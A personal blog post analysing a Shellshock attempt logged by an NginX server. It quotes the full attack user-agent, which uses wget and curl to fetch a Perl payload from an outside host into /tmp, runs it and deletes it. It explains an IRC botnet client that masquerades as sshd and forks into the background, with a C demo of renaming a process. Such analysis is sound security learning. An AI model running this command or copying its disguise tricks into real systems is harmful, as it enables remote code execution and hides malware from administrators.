digging into NginX logs What I've found looking into my server logs

While looking into my NginX log files, I stumbled accross an obvious automatic hacking attempt and decided to investigate it.

About this log entry

Here is the weird entry I've found in my /var/log/nginx/access.log:

188.26.104.151 - - [03/Jan/2017:19:08:00 +0100] "GET / HTTP/1.0" 200 4126 "-" "() { :;}; /bin/bash -c \x22wget http://palmiraplus.kz/.mail -O /tmp/.mail;curl -o /tmp/.mail http://palmiraplus.kz/.mail;chmod +x /tmp/.mail;perl /tmp/.mail;rm -rf /tmp/.mail*\x22"

Ok, the last field is clearly a shell script, according to nginx documentation this is the user-agent that the requester claimed to use. Let's see what it does:

The User Agent

If you are familiar with the shellshock vulnerability, you probably recognized this pattern () { :;}; stuff: an attempt to exploit a well known bash bug, which was fixed years ago. I believe that the main targets of this attack are probably old IoT devives, which are not often upgraded.

Anyway, what does it do ?

It basically tries to spawn a bash process (/bin/bash -c [...]), and exectute this:

wget http://palmiraplus.kz/.mail -O /tmp/.mail
curl -o /tmp/.mail http://palmiraplus.kz/.mail
chmod +x /tmp/.mail
perl /tmp/.mail
rm -rf /tmp/.mail*

  • The 2 first lines are 2 different methods to download a payload from a remote http server, I'll talk about the content of the file later. Most linux devices have either curl or wget installed, using both is a good way to target a wider set of machines. Another interesting thing is that both methods download the payload into /tmp/, the reason is that the folder is writable by every linux user by default.

  • The third line turns the payload into an executable file.

  • the fourth line executes the file, using the perl interpretor (BTW, the payload does not need to be executable, if we feed it to the perl interpretor like that). Using perl is fairly a good choice, as it's installed by default on most linux distibution (at least on the ones I know about).

  • Finally the last line removes the downloaded payload, to cover the track of the attacker.

So I downloaded the perl script from http://palmiraplus.kz/.mail and I will try to explain what it does.

The Perl Script

I've put the script here if you want to see it.

I don't really know perl, but from my understanding the file contains a tiny IRC client which connects to a remote server and waits for specific commands.

It's basically an IRC Botnet.

The implementation of the IRC clients is pretty boring itself, but the script use some other tricks that I find interesting, for instance it changes its own process name, I've always wondered how one could do that, the answer is really really simple !

my @fakeps = ("/usr/sbin/sshd");
    [...]
my $xproc = $fakeps[rand scalar @fakeps];
    [...]
$0="$xproc"."\0";

Which can be reduced into:

$0="/usr/sbin/sshd\0";

It just re-writes $0: the variable that points to the process name, I had no idea that those arguments could be writtable !

I've tried this in C, to see if it was perl specific, and BAAM it works ! :)

#include <string.h>

int main(int argc, char ** argv) {
    // First clear every argument string
    for (int i=0;  i < argc; i++) {
        memset(argv[i], '\0', strlen(argv[i]));
    }
    // overwrite process name
    strcpy(argv[0], "Some really fake name\0");

    // keep the program running,
    // so we can check its name using htop
    while (1) {
        ;
    }
    return 0;
}

If you try to run this code, and then look at its name using ps, top or htop it will be called "Some really fake name" !

Another cool trick of this script is the way it puts itself into the background:

my $pid=fork;
exit if $pid;

Those 2 lines simply duplicate the processus, and then kill the original, which allows the caller program to move on. Without this little trick the vulnerable web server might freeze forever, stuck on the infinite loop of the perl script.

The IRC botnet

When I first looked into this script (a year ago), I tried to connect to the IRC server as if I was a regular victim. Sadly, I was automatically kicked out of the server, there was obviously some kind of authentification.

It appears that the script allways uses the same nickname "V", and only accepts messages (e.g commands) from a user "G", and only if this user disguises himself as localhost.

I've setup a tiny IRC server, and tunned the perl script to connect into it, so I could try it. Basically the script allows any "logged" user to execute bash commands on the target, kinda like an IRC based telnet server.

Now I kinda regret that I did not took time earlier to study the script, it would have been trivial to connect into the IRC botnet and log every commands used, I've could have learnt a lot more about the attackers and their technics...

Conclusion

This little investigation was really fun, I will definitively check my logs more often :)

  • Nov. 19 2017, 04:05 pm
Finding pi is easy